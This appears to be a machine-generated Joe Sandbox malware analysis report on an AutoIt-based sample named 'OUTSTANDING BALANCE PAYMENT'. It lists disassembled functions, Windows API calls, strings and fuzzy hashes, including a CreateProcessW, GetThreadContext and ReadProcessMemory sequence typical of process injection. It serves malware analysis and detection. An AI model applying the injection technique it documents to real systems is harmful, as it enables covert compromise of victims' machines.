                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: QueryValue$CloseOpen
                                                          • String ID: Include$Software\AutoIt v3\AutoIt
                                                          • API String ID: 1586453840-614718249
                                                          • Opcode ID: 91b5e37a2daacf48c41d388a18f72f894db79a87861a8f9d35aa323dc33b2433
                                                          • Instruction ID: 631da625aa2629ce75db38a18f1d4e5d8ed27f5c93ecafc9ab1be326a03ed706
                                                          • Opcode Fuzzy Hash: 91b5e37a2daacf48c41d388a18f72f894db79a87861a8f9d35aa323dc33b2433
                                                          • Instruction Fuzzy Hash: CC112C71600109BFEB04ABA4CD96DBF7BACEF14344F0440A9B606E71A2EBB09E459A50

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1157 b636b8-b63728 CreateWindowExW * 2 ShowWindow * 2
                                                          APIs
                                                          • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00B636E6
                                                          • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00B63707
                                                          • ShowWindow.USER32(00000000,?,?,?,?,00B63AA3,?), ref: 00B6371B
                                                          • ShowWindow.USER32(00000000,?,?,?,?,00B63AA3,?), ref: 00B63724
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Window$CreateShow
                                                          • String ID: AutoIt v3$edit
                                                          • API String ID: 1584632944-3779509399
                                                          • Opcode ID: c6bdd9933e9dde53cec778eb1f9ee696045b85cf2ba21464b57a442311dfdb78
                                                          • Instruction ID: 164f0bb4d29add5643090d60c78da64ba414bd35fe5a9a4008d6c63e4deb484e
                                                          • Opcode Fuzzy Hash: c6bdd9933e9dde53cec778eb1f9ee696045b85cf2ba21464b57a442311dfdb78
                                                          • Instruction Fuzzy Hash: 0CF03A715502D47AE7305757AC48F7B3E7ED7D6F20B04002ABE04A71B0C5A10886CAB4

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1262 16b63d8-16b6527 call 16b4028 call 16b62c8 CreateFileW 1269 16b6529 1262->1269 1270 16b652e-16b653e 1262->1270 1271 16b65de-16b65e3 1269->1271 1273 16b6540 1270->1273 1274 16b6545-16b655f VirtualAlloc 1270->1274 1273->1271 1275 16b6563-16b657a ReadFile 1274->1275 1276 16b6561 1274->1276 1277 16b657e-16b65b8 call 16b6308 call 16b52c8 1275->1277 1278 16b657c 1275->1278 1276->1271 1283 16b65ba-16b65cf call 16b6358 1277->1283 1284 16b65d4-16b65dc ExitProcess 1277->1284 1278->1271 1283->1284 1284->1271
                                                          APIs
                                                            • Part of subcall function 016B62C8: Sleep.KERNELBASE(000001F4), ref: 016B62D9
                                                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 016B651D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2035330255.00000000016B4000.00000040.00000020.00020000.00000000.sdmp, Offset: 016B4000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_16b4000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: CreateFileSleep
                                                          • String ID: X4ZFFXB6YCBKBLFO3TN1VKV52
                                                          • API String ID: 2694422964-2352872793
                                                          • Opcode ID: c0667aeb67069938da1338bb89a4b816b74b843be5c778251f16535c0d3e0885
                                                          • Instruction ID: 923a1791f09331834daccd320c679b2e6b35dd55037cb53fa86f0a9516a6b2fe
                                                          • Opcode Fuzzy Hash: c0667aeb67069938da1338bb89a4b816b74b843be5c778251f16535c0d3e0885
                                                          • Instruction Fuzzy Hash: A2619371D04288DBEF11DBA4C884BDEBBB5AF15304F044198E2497B2C1D7BA1B89CBA5

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1286 b651af-b651c5 1287 b652a2-b652a6 1286->1287 1288 b651cb-b651e0 call b66b0f 1286->1288 1291 b651e6-b65206 call b66a63 1288->1291 1292 bd3ca1-bd3cb0 LoadStringW 1288->1292 1294 bd3cbb-bd3cd3 call b6510d call b64db1 1291->1294 1297 b6520c-b65210 1291->1297 1292->1294 1304 b65220-b6529d call b80d50 call b650e6 call b80d23 Shell_NotifyIconW call b6cb37 1294->1304 1308 bd3cd9-bd3cf7 call b6518c call b64db1 call b6518c 1294->1308 1298 b65216-b6521b call b6510d 1297->1298 1299 b652a7-b652b0 call b66eed 1297->1299 1298->1304 1299->1304 1304->1287 1308->1304
                                                          APIs
                                                          • _memset.LIBCMT ref: 00B6522F
                                                          • _wcscpy.LIBCMT ref: 00B65283
                                                          • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00B65293
                                                          • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00BD3CB0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: IconLoadNotifyShell_String_memset_wcscpy
                                                          • String ID: Line:
                                                          • API String ID: 1053898822-1585850449
                                                          • Opcode ID: 5d695d1e1a4d7cd7dcf403416f4b8a310a20b68e999d4f4eb15ab415c37b9a2f
                                                          • Instruction ID: ba531a0e5d108324b9ddf93a7b3c3a0abd30a543c4d81566748ac90ad053c3b5
                                                          • Opcode Fuzzy Hash: 5d695d1e1a4d7cd7dcf403416f4b8a310a20b68e999d4f4eb15ab415c37b9a2f
                                                          • Instruction Fuzzy Hash: 3931E271408744AFC330EB60DC42FDF77E8AF54300F04456EF98992191EBB8A659CB96
                                                          APIs
                                                            • Part of subcall function 00B641A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00B639FE,?,00000001), ref: 00B641DB
                                                          • _free.LIBCMT ref: 00BD36B7
                                                          • _free.LIBCMT ref: 00BD36FE
                                                            • Part of subcall function 00B6C833: __wsplitpath.LIBCMT ref: 00B6C93E
                                                            • Part of subcall function 00B6C833: _wcscpy.LIBCMT ref: 00B6C953
                                                            • Part of subcall function 00B6C833: _wcscat.LIBCMT ref: 00B6C968
                                                            • Part of subcall function 00B6C833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 00B6C978
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
                                                          • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                          • API String ID: 805182592-1757145024
                                                          • Opcode ID: b1f5d8605dc54c04fa062797a6b368ddf0e020f389a8bd195da0516710ab1c38
                                                          • Instruction ID: 6abd55f95f07f10d2ca325519611d62e6364140dbe8cfc05e2b09585fc0f5e88
                                                          • Opcode Fuzzy Hash: b1f5d8605dc54c04fa062797a6b368ddf0e020f389a8bd195da0516710ab1c38
                                                          • Instruction Fuzzy Hash: 03917D71910219AFCF04EFA4CC919EDBBF4FF19710F1044AAF416AB292EB74AA44CB51
                                                          APIs
                                                            • Part of subcall function 00B65374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00C21148,?,00B661FF,?,00000000,00000001,00000000), ref: 00B65392
                                                            • Part of subcall function 00B649FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00B64A1D
                                                          • _wcscat.LIBCMT ref: 00BD2D80
                                                          • _wcscat.LIBCMT ref: 00BD2DB5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: _wcscat$FileModuleNameOpen
                                                          • String ID: \$\Include\
                                                          • API String ID: 3592542968-2640467822
                                                          • Opcode ID: 4f62e18645a7714a5a6e87fad4d453144dd5a87f5a94e2aa4880d8223bee3467
                                                          • Instruction ID: a65bfd3160af0cf7540518b199a0a9fa253951e03389684f6812298a87df6db8
                                                          • Opcode Fuzzy Hash: 4f62e18645a7714a5a6e87fad4d453144dd5a87f5a94e2aa4880d8223bee3467
                                                          • Instruction Fuzzy Hash: 27518275424340AFC724EF59D881EAEB7F4FF59300B4005AEF64993660EB749E19CB52
                                                          APIs
                                                          • __getstream.LIBCMT ref: 00B834FE
                                                            • Part of subcall function 00B87C0E: __getptd_noexit.LIBCMT ref: 00B87C0E
                                                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 00B83539
                                                          • __wopenfile.LIBCMT ref: 00B83549
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                                          • String ID: <G
                                                          • API String ID: 1820251861-2138716496
                                                          • Opcode ID: c6f1557a79406fd25012a9e9f2aa39f447f5966ca70b8de1c1b708118ab0284f
                                                          • Instruction ID: 7ed87ce350600c9f75c7363f0dc0a6be7a41035e1f7e4bff052f47e31adb2b31
                                                          • Opcode Fuzzy Hash: c6f1557a79406fd25012a9e9f2aa39f447f5966ca70b8de1c1b708118ab0284f
                                                          • Instruction Fuzzy Hash: 30110670A002069BDB22BF708C426AE37E4EF05F50B1884E5E815CB2B1EB74CA41DBA1
                                                          APIs
                                                          • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00B7D28B,SwapMouseButtons,00000004,?), ref: 00B7D2BC
                                                          • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00B7D28B,SwapMouseButtons,00000004,?,?,?,?,00B7C865), ref: 00B7D2DD
                                                          • RegCloseKey.KERNELBASE(00000000,?,?,00B7D28B,SwapMouseButtons,00000004,?,?,?,?,00B7C865), ref: 00B7D2FF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: CloseOpenQueryValue
                                                          • String ID: Control Panel\Mouse
                                                          • API String ID: 3677997916-824357125
                                                          • Opcode ID: e75821033a5bfe7ec3b9d9a1b39e5d4ab643f68acf94b66f45177e2ee24f5ad2
                                                          • Instruction ID: d639f56052433791692112c99ae3fcf7677bf8700a27dce2ecbaff45fb0bb852
                                                          • Opcode Fuzzy Hash: e75821033a5bfe7ec3b9d9a1b39e5d4ab643f68acf94b66f45177e2ee24f5ad2
                                                          • Instruction Fuzzy Hash: 92113975611208BFDB218FA8CC84EAF7BF8EF44794F1088A9E819D7111E671AE419B64
                                                          APIs
                                                          • CreateProcessW.KERNELBASE(?,00000000), ref: 016B5A83
                                                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 016B5B19
                                                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 016B5B3B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2035330255.00000000016B4000.00000040.00000020.00020000.00000000.sdmp, Offset: 016B4000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_16b4000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                          • String ID:
                                                          • API String ID: 2438371351-0
                                                          • Opcode ID: e8e7a77c1c38f92167ec50984bffac71589908538948dc0fdf133907e09ee162
                                                          • Instruction ID: 91267e62257879dfb2b9cc1b269cc197391820bb8c97578be2c2c5f1dad0bc26
                                                          • Opcode Fuzzy Hash: e8e7a77c1c38f92167ec50984bffac71589908538948dc0fdf133907e09ee162
                                                          • Instruction Fuzzy Hash: 9062EB30A142589BEB24DBA4CC90BDEB776EF58300F1091A9D10DEB394E7759E81CB59
                                                          APIs
                                                            • Part of subcall function 00B64517: _fseek.LIBCMT ref: 00B6452F
                                                            • Part of subcall function 00BAC56D: _wcscmp.LIBCMT ref: 00BAC65D
                                                            • Part of subcall function 00BAC56D: _wcscmp.LIBCMT ref: 00BAC670
                                                          • _free.LIBCMT ref: 00BAC4DD
                                                          • _free.LIBCMT ref: 00BAC4E4
                                                          • _free.LIBCMT ref: 00BAC54F
                                                            • Part of subcall function 00B81C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00B87A85), ref: 00B81CB1
                                                            • Part of subcall function 00B81C9D: GetLastError.KERNEL32(00000000,?,00B87A85), ref: 00B81CC3
                                                          • _free.LIBCMT ref: 00BAC557
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                          • String ID:
                                                          • API String ID: 1552873950-0
                                                          • Opcode ID: 7f252b61be53e347bf95bf8cf1f18cb687a3b92cb37ed7ac3162ce406380a335
                                                          • Instruction ID: 56f34d0ced4a4fe6086e913f59f60c9aa3312c1205c603ff0b394a6916a766d1
                                                          • Opcode Fuzzy Hash: 7f252b61be53e347bf95bf8cf1f18cb687a3b92cb37ed7ac3162ce406380a335
                                                          • Instruction Fuzzy Hash: 01514CB1904218AFDB149F68DC81AAEBBB9EF49300F1004EEF259A7251DB755A80CF59
                                                          APIs
                                                          • _memset.LIBCMT ref: 00B7EBB2
                                                            • Part of subcall function 00B651AF: _memset.LIBCMT ref: 00B6522F
                                                            • Part of subcall function 00B651AF: _wcscpy.LIBCMT ref: 00B65283
                                                            • Part of subcall function 00B651AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00B65293
                                                          • KillTimer.USER32(?,00000001,?,?), ref: 00B7EC07
                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00B7EC16
                                                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00BD3C88
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                          • String ID:
                                                          • API String ID: 1378193009-0
                                                          • Opcode ID: 81d26eaa3a875d0120cdbc8906cabe71426ec61b4ac6ed50d7b89fdb8435643d
                                                          • Instruction ID: 7d66fea3d5fd45ca7972e36d97e216ba7f3b5866cd6fb8bd2ff21c7ddc930e4b
                                                          • Opcode Fuzzy Hash: 81d26eaa3a875d0120cdbc8906cabe71426ec61b4ac6ed50d7b89fdb8435643d
                                                          • Instruction Fuzzy Hash: 9321F8745047849FE7339B288855BEAFBECDF05704F0404DEE6AE56242D7746A848B52
                                                          APIs
                                                          • _memset.LIBCMT ref: 00BD3725
                                                          • GetOpenFileNameW.COMDLG32 ref: 00BD376F
                                                            • Part of subcall function 00B6660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B653B1,?,?,00B661FF,?,00000000,00000001,00000000), ref: 00B6662F
                                                            • Part of subcall function 00B640A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00B640C6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Name$Path$FileFullLongOpen_memset
                                                          • String ID: X
                                                          • API String ID: 3777226403-3081909835
                                                          • Opcode ID: d956f8a8af25d05a9e9abbb7dad6ef601e0697ae66b97af7e78bd4ad270dcee7
                                                          • Instruction ID: bec07e69d49c3b629dcd5cdea0da83d0fc9e01997cea7ec548f36de6c915538e
                                                          • Opcode Fuzzy Hash: d956f8a8af25d05a9e9abbb7dad6ef601e0697ae66b97af7e78bd4ad270dcee7
                                                          • Instruction Fuzzy Hash: CC21A571A106989FCF01EFD4D845BEEBBF99F49704F0040AAE405B7241DFB89A898F65
                                                          APIs
                                                          • GetTempPathW.KERNEL32(00000104,?), ref: 00BAC72F
                                                          • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00BAC746
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Temp$FileNamePath
                                                          • String ID: aut
                                                          • API String ID: 3285503233-3010740371
                                                          • Opcode ID: 120ada28184f4f767256a692e27bc57298995fbfea9486bb1a1cf030cfee232d
                                                          • Instruction ID: 75187146b50d1745a7324c80c2dd5287ceef62af2ce968eb682b5d2072c82dd1
                                                          • Opcode Fuzzy Hash: 120ada28184f4f767256a692e27bc57298995fbfea9486bb1a1cf030cfee232d
                                                          • Instruction Fuzzy Hash: 18D05E7150030EABDB10AB90DC4EFCAB76C9700709F0001A07750AA0B1DAF0E6998B54
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 798aabf7a103670e4b0dc854748f2a62c595a97f67e83e8a8b8497ef77ddbc2d
                                                          • Instruction ID: 4c75b44cbc7a958f31e48d096c24f8e550e4b8d4fb6a1b5a5fb136160f88a5a2
                                                          • Opcode Fuzzy Hash: 798aabf7a103670e4b0dc854748f2a62c595a97f67e83e8a8b8497ef77ddbc2d
                                                          • Instruction Fuzzy Hash: F6F15C716083019FC710DF28C881B6EBBE5FF88314F1489ADF9999B252D770E945CB82
                                                          APIs
                                                          • _memset.LIBCMT ref: 00B65022
                                                          • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00B650CB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: IconNotifyShell__memset
                                                          • String ID:
                                                          • API String ID: 928536360-0
                                                          • Opcode ID: 327e0f5d6a1f4a623cfc0ef08ecf70ee46e4112ef26adaf756e58a2a1a98f2c9
                                                          • Instruction ID: fe5ad9a61cda1d26a8231ac49a27a325ad096ce86608e04819e45249907c1e63
                                                          • Opcode Fuzzy Hash: 327e0f5d6a1f4a623cfc0ef08ecf70ee46e4112ef26adaf756e58a2a1a98f2c9
                                                          • Instruction Fuzzy Hash: 6631BDB0504701CFC331EF28D88179BBBE8FF59308F00096EE99A87241E775A954CB92
                                                          APIs
                                                          • __FF_MSGBANNER.LIBCMT ref: 00B83973
                                                            • Part of subcall function 00B881C2: __NMSG_WRITE.LIBCMT ref: 00B881E9
                                                            • Part of subcall function 00B881C2: __NMSG_WRITE.LIBCMT ref: 00B881F3
                                                          • __NMSG_WRITE.LIBCMT ref: 00B8397A
                                                            • Part of subcall function 00B8821F: GetModuleFileNameW.KERNEL32(00000000,00C20312,00000104,00000000,00000001,00000000), ref: 00B882B1
                                                            • Part of subcall function 00B8821F: ___crtMessageBoxW.LIBCMT ref: 00B8835F
                                                            • Part of subcall function 00B81145: ___crtCorExitProcess.LIBCMT ref: 00B8114B
                                                            • Part of subcall function 00B81145: ExitProcess.KERNEL32 ref: 00B81154
                                                            • Part of subcall function 00B87C0E: __getptd_noexit.LIBCMT ref: 00B87C0E
                                                          • RtlAllocateHeap.NTDLL(01670000,00000000,00000001,00000001,00000000,?,?,00B7F507,?,0000000E), ref: 00B8399F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
